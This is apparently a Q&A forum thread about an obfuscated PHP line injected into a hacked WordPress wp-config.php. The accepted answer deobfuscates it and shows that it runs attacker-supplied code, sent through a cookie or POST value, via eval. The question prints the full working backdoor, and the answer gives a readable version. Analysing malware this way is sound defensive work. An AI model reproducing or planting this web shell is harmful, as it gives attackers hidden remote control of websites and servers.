# Wordpress Hacked, understanding obfuscated line on wp-config.php

Tags: php, deobfuscation

my friend's wordpress wp-config.php was added with one line of code:

```
$ge142efa['cfea']="\x6d\x57\x36\x5f\x6b\x64\x2f\x49\x42\x7e\x4b\x45\x72\x6c\x28\x2e\x7a\x3a\x2a\x39\x37\x61\x67\x22\x73\x31\x38\x9\x48\x23\x70\x34\x7c\x30\x26\x43\x2b\x27\x78\x3d\x75\x68\x5a\x54\x4c\x51\x79\xd\x5b\x4e\x33\x50\xa\x44\x55\x32\x4a\x20\x3c\x25\x65\x69\x46\x60\x59\x4f\x21\x56\x71\x74\x53\x24\x5e\x40\x47\x2c\x6e\x5d\x5c\x3b\x4d\x58\x76\x3f\x35\x29\x7b\x7d\x52\x63\x6f\x77\x66\x6a\x62\x3e\x41\x2d";$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][92].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][94]]=$ge142efa['cfea'][89].$ge142efa['cfea'][41].$ge142efa['cfea'][12];$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][26]]=$ge142efa['cfea'][90].$ge142efa['cfea'][12].$ge142efa['cfea'][5];$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]=$ge142efa['cfea'][24].$ge142efa['cfea'][69].$ge142efa['cfea'][12].$ge142efa['cfea'][13].$ge142efa['cfea'][60].$ge142efa['cfea'][76];$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]=$ge142efa['cfea'][61].$ge142efa['cfea'][76].$ge142efa['cfea'][61].$ge142efa['cfea'][3].$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][69];$ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]=$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][61].$ge142efa['cfea'][21].$ge142efa['cfea'][13].$ge142efa['cfea'][61].$ge142efa['cfea'][16].$ge142efa['cfea'][60];$ge142efa[$ge142efa['cfea'][16].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][50].$ge142efa['cfea'][89]]=$ge142efa['cfea'][30].$ge142efa['cfea'][41].$ge142efa['cfea'][30].$ge142efa['cfea'][82].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][24].$ge142efa['cfea'][61].$ge142efa['cfea'][90].$ge142efa['cfea'][76];$ge142efa[$ge142efa['cfea'][61].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][26].$ge142efa['cfea'][50].$ge142efa['cfea'][33].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]=$ge142efa['cfea'][40].$ge142efa['cfea'][76].$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][61].$ge142efa['cfea'][21].$ge142efa['cfea'][13].$ge142efa['cfea'][61].$ge142efa['cfea'][16].$ge142efa['cfea'][60];$ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][92].$ge142efa['cfea'][26].$ge142efa['cfea'][20].$ge142efa['cfea'][50].$ge142efa['cfea'][2]]=$ge142efa['cfea'][94].$ge142efa['cfea'][21].$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][2].$ge142efa['cfea'][31].$ge142efa['cfea'][3].$ge142efa['cfea'][5].$ge142efa['cfea'][60].$ge142efa['cfea'][89].$ge142efa['cfea'][90].$ge142efa['cfea'][5].$ge142efa['cfea'][60];$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][89].$ge142efa['cfea'][33].$ge142efa['cfea'][84]]=$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][69].$ge142efa['cfea'][3].$ge142efa['cfea'][69].$ge142efa['cfea'][61].$ge142efa['cfea'][0].$ge142efa['cfea'][60].$ge142efa['cfea'][3].$ge142efa['cfea'][13].$ge142efa['cfea'][61].$ge142efa['cfea'][0].$ge142efa['cfea'][61].$ge142efa['cfea'][69];$ge142efa[$ge142efa['cfea'][40].$ge142efa['cfea'][31].$ge142efa['cfea'][19].$ge142efa['cfea'][25]]=$ge142efa['cfea'][61].$ge142efa['cfea'][31].$ge142efa['cfea'][2].$ge142efa['cfea'][25];$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][55].$ge142efa['cfea'][55].$ge142efa['cfea'][19].$ge142efa['cfea'][26].$ge142efa['cfea'][2].$ge142efa['cfea'][26].$ge142efa['cfea'][55]]=$ge142efa['cfea'][22].$ge142efa['cfea'][55].$ge142efa['cfea'][94].$ge142efa['cfea'][89];$ge142efa[$ge142efa['cfea'][12].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][94].$ge142efa['cfea'][92]]=$_POST;$ge142efa[$ge142efa['cfea'][93].$ge142efa['cfea'][19].$ge142efa['cfea'][20].$ge142efa['cfea'][84]]=$_COOKIE;@$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]($ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][12].$ge142efa['cfea'][90].$ge142efa['cfea'][12].$ge142efa['cfea'][3].$ge142efa['cfea'][13].$ge142efa['cfea'][90].$ge142efa['cfea'][22],NULL);@$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]($ge142efa['cfea'][13].$ge142efa['cfea'][90].$ge142efa['cfea'][22].$ge142efa['cfea'][3].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][12].$ge142efa['cfea'][90].$ge142efa['cfea'][12].$ge142efa['cfea'][24],0);@$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]($ge142efa['cfea'][0].$ge142efa['cfea'][21].$ge142efa['cfea'][38].$ge142efa['cfea'][3].$ge142efa['cfea'][60].$ge142efa['cfea'][38].$ge142efa['cfea'][60].$ge142efa['cfea'][89].$ge142efa['cfea'][40].$ge142efa['cfea'][69].$ge142efa['cfea'][61].$ge142efa['cfea'][90].$ge142efa['cfea'][76].$ge142efa['cfea'][3].$ge142efa['cfea'][69].$ge142efa['cfea'][61].$ge142efa['cfea'][0].$ge142efa['cfea'][60],0);@$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][89].$ge142efa['cfea'][33].$ge142efa['cfea'][84]](0);$tf027f=NULL;$w38258dd=NULL;$ge142efa[$ge142efa['cfea'][0].$ge142efa['cfea'][33].$ge142efa['cfea'][33].$ge142efa['cfea'][25].$ge142efa['cfea'][89].$ge142efa['cfea'][26].$ge142efa['cfea'][31].$ge142efa['cfea'][20].$ge142efa['cfea'][84]]=$ge142efa['cfea'][33].$ge142efa['cfea'][31].$ge142efa['cfea'][20].$ge142efa['cfea'][92].$ge142efa['cfea'][94].$ge142efa['cfea'][84].$ge142efa['cfea'][31].$ge142efa['cfea'][94].$ge142efa['cfea'][97].$ge142efa['cfea'][26].$ge142efa['cfea'][19].$ge142efa['cfea'][89].$ge142efa['cfea'][20].$ge142efa['cfea'][97].$ge142efa['cfea'][31].$ge142efa['cfea'][33].$ge142efa['cfea'][94].$ge142efa['cfea'][31].$ge142efa['cfea'][97].$ge142efa['cfea'][26].$ge142efa['cfea'][26].$ge142efa['cfea'][25].$ge142efa['cfea'][55].$ge142efa['cfea'][97].$ge142efa['cfea'][84].$ge142efa['cfea'][20].$ge142efa['cfea'][92].$ge142efa['cfea'][21].$ge142efa['cfea'][26].$ge142efa['cfea'][94].$ge142efa['cfea'][55].$ge142efa['cfea'][2].$ge142efa['cfea'][25].$ge142efa['cfea'][5].$ge142efa['cfea'][33].$ge142efa['cfea'][20];global$m001c8475;function g2bc($tf027f,$p7ec){global$ge142efa;$de211af="";for($z225cd560=0;$z225cd560<$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]($tf027f);){for($a7a4f09df=0;$a7a4f09df<$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]($p7ec)&&$z225cd560<$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]($tf027f);$a7a4f09df++,$z225cd560++){$de211af.=$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][92].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][94]]($ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][26]]($tf027f[$z225cd560])^$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][26]]($p7ec[$a7a4f09df]));}}return$de211af;}function i461($tf027f,$p7ec){global$ge142efa;global$m001c8475;return$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][55].$ge142efa['cfea'][55].$ge142efa['cfea'][19].$ge142efa['cfea'][26].$ge142efa['cfea'][2].$ge142efa['cfea'][26].$ge142efa['cfea'][55]]($ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][55].$ge142efa['cfea'][55].$ge142efa['cfea'][19].$ge142efa['cfea'][26].$ge142efa['cfea'][2].$ge142efa['cfea'][26].$ge142efa['cfea'][55]]($tf027f,$m001c8475),$p7ec);}foreach($ge142efa[$ge142efa['cfea'][93].$ge142efa['cfea'][19].$ge142efa['cfea'][20].$ge142efa['cfea'][84]]as$p7ec=>$i61171){$tf027f=$i61171;$w38258dd=$p7ec;}if(!$tf027f){foreach($ge142efa[$ge142efa['cfea'][12].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][94].$ge142efa['cfea'][92]]as$p7ec=>$i61171){$tf027f=$i61171;$w38258dd=$p7ec;}}$tf027f=@$ge142efa[$ge142efa['cfea'][61].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][26].$ge142efa['cfea'][50].$ge142efa['cfea'][33].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]($ge142efa[$ge142efa['cfea'][40].$ge142efa['cfea'][31].$ge142efa['cfea'][19].$ge142efa['cfea'][25]]($ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][92].$ge142efa['cfea'][26].$ge142efa['cfea'][20].$ge142efa['cfea'][50].$ge142efa['cfea'][2]]($tf027f),$w38258dd));if(isset($tf027f[$ge142efa['cfea'][21].$ge142efa['cfea'][4]])&&$m001c8475==$tf027f[$ge142efa['cfea'][21].$ge142efa['cfea'][4]]){if($tf027f[$ge142efa['cfea'][21]]==$ge142efa['cfea'][61]){$z225cd560=Array($ge142efa['cfea'][30].$ge142efa['cfea'][82]=>@$ge142efa[$ge142efa['cfea'][16].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][50].$ge142efa['cfea'][89]](),$ge142efa['cfea'][24].$ge142efa['cfea'][82]=>$ge142efa['cfea'][25].$ge142efa['cfea'][15].$ge142efa['cfea'][33].$ge142efa['cfea'][97].$ge142efa['cfea'][25],);echo@$ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]($z225cd560);}elseif($tf027f[$ge142efa['cfea'][21]]==$ge142efa['cfea'][60]){eval($tf027f[$ge142efa['cfea'][5]]);}exit();}
```

What does it means?
I've tried to change eval to print, but nothing shown.

https://eval.in/584427

Comment: Do one thing just replace your wp-config file with fresh instance of wordpress

Comment: Good luck making sense of it. Probs best bet is to rebuild wordpress and remove any sketchy plugins.

Comment: no, i just curious what does it do.. '__') the site was already removed completely..

Comment: did you see anything on site like an IFrame etc when it was hacked?

Comment: dont know if it is accurate but some URL's could be seen here

http://ddecode.com/hexdecoder/?results=9f9d8c52e9027d0863adeaafd8e3710e

Answer (score 2, accepted):

By using a `var_dump` after the first statement with `$_COOKIE` I could see that the structure of the first array appears to contain several function names which are supposedly called later:

```
var_dump($ge142efa);

array(14) {
  ["cfea"]=>
[N3Pring(98) "mW6_kd/IB~KErl(.z:*97ag"s18   H#p4|0&C+'x=uhZTLQy
DU2J <%eiF`YO!VqtS$^@G,n]\;MXv?5){}Rcowfjb>A-"
  ["hfa2b"]=>
  string(3) "chr"
  ["he58"]=>
  string(3) "ord"
  ["ge19947"]=>
  string(6) "strlen"
  ["xa2a5ede"]=>
  string(7) "ini_set"
  ["k5051"]=>
  string(9) "serialize"
  ["z2503c"]=>
  string(10) "phpversion"
  ["i50830251"]=>
  string(11) "unserialize"
  ["kf8736"]=>
  string(13) "base64_decode"
  ["vc05"]=>
  string(14) "set_time_limit"
  ["u491"]=>
  string(4) "i461"
  ["v2298682"]=>
  string(4) "g2bc"
  ["re5bf"]=>
  string(6) "$_POST"
  ["j975"]=>
  string(8) "$_COOKIE"
}
```

I have replaced the `$_POST` and `$_COOKIE` contents with strings as placeholders because my test environment is `php -f` inside a container.

---

The part between this array and the first function declaration boils down to this:

```
@ini_set('error_log', NULL); // @$ge142efa['xa2a5ede']('error_log', NULL);
@ini_set('log_errors', 0); // @$ge142efa['xa2a5ede']('log_errors', 0);
@ini_set('max_execution_time', 0); // @$ge142efa['xa2a5ede']('max_execution_time', 0);
@set_time_limit(0); // @$ge142efa['vc05'](0);
$tf027f = NULL;
$w38258dd = NULL;
$ge142efa['m001c8475'] = '047fb54b-89c7-40b4-8812-57fa8b261d07';
```

---

The first function reads thus:

```
function g2bc($tf027f, $p7ec){
  global $ge142efa;
  $de211af = "";
  for($i = 0; $i < "strlen"($tf027f);){
    for($j = 0; $j < "strlen"($p7ec) && $i < "strlen"($tf027f); $j++, $i++){
      $de211af .= "chr"("ord"($tf027f[$i])^"ord"($p7ec[$j]));
    }
  }
  return $de211af;
}
```

It appears to xor two strings and return the result.
The function below that, `i461`, uses it twice:

```
function i461($tf027f, $p7ec){
  global $ge142efa;
  global $m001c8475;
  return "g2bc"("g2bc"($tf027f,$m001c8475),$p7ec);
}
```

---

The code below these two functions
can be beautified to this:

```
foreach($_COOKIE as $p7ec => $i61171){
  $tf027f = $i61171;
  $w38258dd = $p7ec;
}
if(!$tf027f){
  foreach($_POST as $p7ec => $i61171){
    $tf027f = $i61171;
    $w38258dd = $p7ec;
  }
}
$tf027f =@ "unserialize"("i461"("base64_decode"($tf027f),$w38258dd));
if(isset($tf027f["ak"]) && $m001c8475 == $tf027f["ak"]){
  if($tf027f["a"] == "i"){
    $z225cd560 = Array("pv" => @"phpversion"(), "sv" => "1.0-1",);
    echo@"serialize"($z225cd560);
  }elseif($tf027f["a"] == "e"){
    eval($tf027f["d"]);
  }
  exit();
}
```

The critical part here is the `eval`. From my point of view this looks like code that executes something given by the right combination of `$_COOKIE` and/or `$_POST`. Basically a portion of code waiting to get the right request and execute the code specified by it.

Answer (score 1):

I'm Just dealing with same issue. Your friend's have to make some changes. May be IP Address is traced by some person & he is doing some changes in database and it's affecting your front end and code also.

```
 - If you have backup of database then change the database. 
 - Install some security Plugin like All In One WP Security & Firewall.
   (Because if IP is traced again than it may help in future).
```

Some other changes.

- Search Images path in database may be it contains malware.
- Remove unused script from code.
- Change Admin panel login credential.
- Change Cpanel credential.

Comment: thanks, but what i asked is the meaning of that code

Comment: I'm not sure for it brother . But may be it's a random function's code of combination of Hex/octal combination. Wordpress is cms so may be it's inserted through database in code.

Comment: @Kokizzu https://eval.in/584444 go figure , decoded hex http://ddecode.com/hexdecoder/?results=9cac9ad7c85615d307450ec27b8d396a